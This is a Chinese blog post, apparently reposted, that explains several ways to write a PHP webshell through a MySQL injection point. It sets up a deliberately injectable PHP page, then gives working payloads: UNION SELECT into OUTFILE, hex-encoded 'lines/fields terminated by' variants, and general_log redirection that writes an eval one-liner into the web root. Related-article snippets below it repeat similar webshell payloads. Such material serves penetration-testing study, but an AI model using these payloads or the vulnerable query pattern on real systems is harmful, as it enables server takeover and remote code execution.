MySQL注入点写入WebShell的几种方式

最新推荐文章于 2024-04-01 12:52:48 发布
最新推荐文章于 2024-04-01 12:52:48 发布
阅读量346 收藏
点赞数 1
文章标签: mysql 数据库 php
原文链接:https://www.secpulse.com/archives/129728.html
版权

在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。

比如:当面对一个MySQL注入点,通过使用SQLmap--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。

一个MySQL注入点写入Webshell,需要满足哪些条件呢?简单来说,需要了解secure_file_priv是否支持数据导出、还有当前数据库用户权限,当然,root用户数据库的全部权限,但写入Webshell 并不需要一定是root用户。

接下来,本文将通过构造一个注入点,分享几种Webshell写入的技巧。

0x01 构造一个注入点

1、在默认数据库test中创建测试表admin和测试数据,新建test用户授予FILE权限。

create user 'test'@'localhost' identified by '123456';

grant file on *.* to 'test'@'localhost';

2、使用test用户连接数据库。

<?php

$con=mysql_connect("localhost","test","123456");

mysql_select_db("test", $con);

$id = $_REQUEST[ 'id' ];

$query  = "SELECT * FROM test.admin WHERE id = $id ";

$result = mysql_query($query);

......

0x02 写入WebShell的几种方式

1、利用Union select 写入

这是最常见的写入方式,union 跟select into outfile,将一句话写入evil.php,仅适用于联合注入。

具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。 

?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'

?id=1unionselect1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "E:/study/WWW/evil.php"

2、利用分隔符写入

当Mysql注入点为盲注或报错,Union select写入的方式显然是利用不了的,那么可以通过分隔符写入。SQLMAP的 --os-shell命令,所采用的就是一下这种方式。

具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。

?id=1 LIMIT 0,1 INTO OUTFILE 'E:/study/WWW/evil.php' lines terminatedby0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 --

同样的技巧,一共有四种形式:

?id=1 INTO OUTFILE '物理路径' lines terminated by  (一句话hex编码)#

?id=1 INTO OUTFILE '物理路径' fields terminated by (一句话hex编码)#

?id=1 INTO OUTFILE '物理路径' columns terminated by (一句话hex编码)#

?id=1 INTO OUTFILE '物理路径' lines starting by    (一句话hex编码)#

3、利用log写入

新版本的MySQL设置了导出文件的路径,很难在获取Webshell过程中去修改配置文件,无法通过使用select into outfile来写入一句话。这时,我们可以通过修改MySQL的log文件来获取Webshell。

具体权限要求:数据库用户需具备Super和File服务器权限、获取物理路径。

show variables like '%general%';             #查看配置

set global general_log = on;               #开启general log模式

set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址

select '<?php eval($_GET[g]);?>'             #写入shell

set global general_log=off;                  #关闭general log模式

 

whatever`
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第01篇:MySQL注入WebShell的5种方式1
08-03
1、在默认数据库 test 中创建测试表admin和测试数据,新建test用户授予FILE权限 2、使用test用户连接 1、利用Union select 写入
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
通过MySQL写入webshell几种方式(小宇特详解)
小宇的web博客
08-07 4783
通过MySQL写入webshell几种方式 -01-通过outfile写入shell 利用条件 1.root权限2.网站的绝对路径且具有写入权限,能够使用into outfile和into dumpfile来进行写入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell写入表中 利用条件 1.root权限2.网站
2024HVV行动-蓝队面试纯干货
最新发布
Welcome To Myon'Blog !
04-01 1646
冰蝎3.0内置的默认内置16个ua(user-agent)头 content-length 请求长度,对于上传文件,命令执行来讲,加密的参数不定长,但是对于密钥交互,获取基本信息来讲,payload 都为定长。选择默认脚本编码生成的情况下,jsp会出现xc,pass字符和Java反射(ClassLoader,getClass().getClassLoader()),base64加解码等特征,php,asp则为普通的一句话木马。常用函数:if()、length()、substring()、substr()
SQL注入webshell
huangyongkang666的博客
03-25 2563
SQL注入webshell 1.MySQLshell 写入WebShell几种方式 1、利用Union select 写入 需要满足的条件 对web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
web安全】——基于SQL注入拿到webshell
Demo不是emo的博客
11-20 4535
今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天一篇博客来巩固一下这方面的知识,希望对您们也有帮助
SQL注入写入Webshell(Lines terminated by写入
faclon666的博客
03-31 662
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来写入webshell。1.当mysql注入为盲注或报错,Union select写入是不能利用的,那么可以通过分隔符写入(SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
主要介绍了浅谈一次与sql注入 & webshell 的美丽“邂逅”,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
MySql备份得到WebShell.pdf
10-10
MySql备份得到WebShell.pdf
【网络安全】SQL注入新思维之webshell提权
m0_71745258的博客
07-28 860
大量的hr面试官都喜欢从SQL注入开始询问,所以留心了一下关于SQL注入的问题的频率。结果非常惊讶!不出意外的是–os-shell名列榜首。比如这道题SQL注入getshell方式?答getshell是指攻击者通过利用SQL注入获取系统权限的方法,Webshell提权分两种一是利用outfile函数,另外一种是利用**–os-shell**;UDF提权通过堆叠注入实现;MOF提权通过"条件竞争"实现小提示。...
mysql 报错注入文件_大哥带我们的mysql注入
weixin_39718006的博客
01-27 318
这是今天的任务任务三个:第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入写入一个webshell,都是要求手工,具体方法自己百度mysql5注入相关内容union select 1,2,3,4,5查询语句 第一步是先构造闭合 加入单引号报错 然后 更据and 1=1 and1=2看是字符型还是布尔型注入...
mysql数据写入突然慢了_通过MySQL写入webshell几种方式
weixin_39648824的博客
11-28 287
当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库写入webshell的方法,以拿到phpMyAdmin为例。-01-通过outfile写入shell利用条件:1、root权限2、网站的绝对路径...
SQL注入写入webshell的方法(union select写入
faclon666的博客
03-30 1165
(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3493
Mysql写入webshell
MySQL WebShell总结
Poolhuang的博客
05-27 397
1、写入方式 ①、基于outfile写入 union select 例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ; ###利用分隔符写入 lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。 例:?id=1 into outfile '物理路径' lines terminated by '<?php .
MySQL弱密码和webshell
qq_44312507的博客
12-17 1715
MySQL弱密码和webshell问题文档 一、了解漏洞 1、mysql是什么 MySQL 是最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。 关系数据库管理系统(Relational Database Management System:RDBMS)...
sql注入如何写入webshell
05-11
1. 利用 union select 语句:在注入处添加 union select 语句,然后将 webshell 的代码写入到 select 后面的字段中,以获取服务器上的文件权限。 例如:假设漏洞在 id 参数处,可以使用以下语句在数据库中创建...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值